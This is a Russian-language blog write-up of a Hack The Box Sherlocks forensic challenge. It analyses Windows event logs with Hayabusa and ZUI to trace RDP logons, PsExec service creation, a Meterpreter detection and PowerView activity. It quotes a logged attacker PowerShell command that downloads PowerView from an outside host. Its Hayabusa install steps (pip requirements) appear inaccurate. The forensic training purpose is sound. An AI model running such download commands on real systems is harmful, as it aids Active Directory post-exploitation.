Журналы событий Windows содержат важную информацию о деятельности системы и пользователей. Анализ этих данных помогает выявлять угрозы безопасности, диагностировать проблемы. Сегодня, в рамках прохождения задания Hunter c площадки Hack The Box Sherlocks, с помощью инструментов Hayabusa и ZUI, будем анализировать данные журналов событий Windows.
Еще по теме: Анализ событий Windows
Использование Hayabusa для анализа журналов Windows
Hayabusa — это инструмент для быстрого и эффективного анализа журналов событий Windows. Он разработан для автоматического выявления аномалий и угроз в системных журналах. Hayabusa использует сигнатуры и поведенческие модели для обнаружения подозрительной активности.
Основные возможности Hayabusa:
- Hayabusa способен обрабатывать большие объемы данных за короткое время.
- Инструмент включает в себя множество предустановленных сигнатур для выявления известных угроз.
- Пользователи могут добавлять собственные сигнатуры и правила.
- Hayabusa легко интегрируется с системами управления событиями информационной безопасности (SIEM).
Установка Hayabusa
Тулзу можно установить из репозитория GitHub. Требуется Python и несколько дополнительных библиотек.
1 2 3 |
git clone https://github.com/Yamato-Security/hayabusa.git cd hayabusa pip install -r requirements.txt |
Использование Hayabusa
Начнем анализ журналов событий Windows, для чего запустим Hayabusa.
Посмотрим сводку по авторизациям:
1 |
./hayabusa logon-summary -d ~/Hunter_Acquisition/Acquisition/2023-06-22T092426_Acquisition/C/ |
Видим, что с хоста 172.17.79.133 (Kali) было подключение по RDP.
Запустим анализ событий правилами Sigma и hayabusa-rules:
1 |
./hayabusa csv-timeline -d ~/C/ --output ~/hayabusa_last.csv --UTC |
Сразу в глаза бросаются алерты:
- Defender Alert;
- PowerView PowerShell Cmdlets — ScriptBlock.
Использование ZUI для анализа журналов Windows
Дальше работать с результатами Hayabusa будем в ZUI (см. Анализ с помощью сканера ZUI).
Давайте поищем авторизации с Kali:
1 |
EventID==4624. | 172.17.79.133 |
Наши предположения об авторизациях подтвердились.
Анализ событий PsExec
Отфильтруем события по Logon ID 0x26fbee и увидим последовательность событий, похожую на работу PsExec. Далее поищем события, связанные с созданием служб в нужный нам интервал времени:
1 |
EventID==7045. | "2023-06-21" |
К индикаторам можем отнести название исполняемого файла и имя службы:
- служба: tFdj;
- путь к исполняемому файлу: %systemroot%\\owUjOMCY.exe;
- время: 2023-06-21T11:19:34.
К сожалению, событий создания или завершения процесса в нашем интервале нет.

Давайте отсортируем по типам правил:
1 |
"06-21" | count() by RuleTitle | sort -r count |
И точечно посмотрим на некоторые.
События связанные с Meterpreter
1 |
"06-21" | RuleTitle=="Antivirus Hacktool Detection" |
Событие с EventId=1116 из журнала Microsoft-Windows-Windows Defender/Operational:
1 |
Threat: Trojan:Win64/Meterpreter.E ¦ Severity: Severe ¦ Type: Trojan ¦ User: NT AUTHORITY\SYSTEM ¦ Path: file:_C:\Users\alonzo.spire\notepad.exe; shellopencmd:_HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\ ¦ Proc: Unknown |
Оно сигнализирует нам о том, что файл C:\Users\alonzo.spire\notepad.exe определен как Trojan:Win64/Meterpreter.E. и пытался закрепиться или закрепился, используя следующую ветку реестра:
1 |
HKLM\SOFTWARE\CLASSES\txtfile\shell\open\command\\ |
Время обнаружения: 2023-06-21 12:33:55.002.
События связанные PowerView
Посмотрим события, связанные с работой PowerShell.
1 |
"06-21" | PwSh | Details!="HostApplication: n/a" |
В результате получим много событий EventId=4104 и одно событие EventId=400.
Событие ниже свидетельствует о загрузке злоумышленником утилиты PowerView, предназначенной для постэксплуатации в средах Active Directory. Утилита сохранена с именем clean.ps1.
Время регистрации события — 2023-06-21 11:30:40.755.
1 |
Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.19041.2673 HostId=b9505ee1-faf5-41b3-af08-7dddad696ee3 HostApplication=powershell -c (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'clean.ps1') EngineVersion=5.1.19041.2673 RunspaceId=248a767b-db92-435f-bda4-5e42213ebf64 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None |
События 4104 регистрируют куски кода PowerView, которые используют подозрительные функции.
Анализ событий RDP
Давайте уточним время работы хакера по RDP. Для этого еще раз обратимся к событиям авторизации и к журналам:
- Terminal-Services-RemoteConnectionManager/Operational;
- TerminalServices-LocalSessionManager/Operational.
1 |
"06-21" | 4624. or "RDS-" |
Можем предположить, что RDP-сессия длилась с 2023-06-21 11:44:51.426 по 2023-06-21 12:53:45.809.
На этом интересные события закончились, не забудем внести информацию в IRIS.
Заключение
Hayabusa эффективно обнаруживает такие угрозы, как:
- Подбор паролей и несанкционированные попытки входа.
- Изменения в системных конфигурациях и настройках безопасности.
- Запуск подозрительных процессов и программ.
Благодаря гибкости и возможности интеграции с другими инструментами, Hayabusa — незаменимый помощник в арсенале компьютерного криминалиста и специалиста по кибербезопасности.
ПОЛЕЗНЫЕ ССЫЛКИ: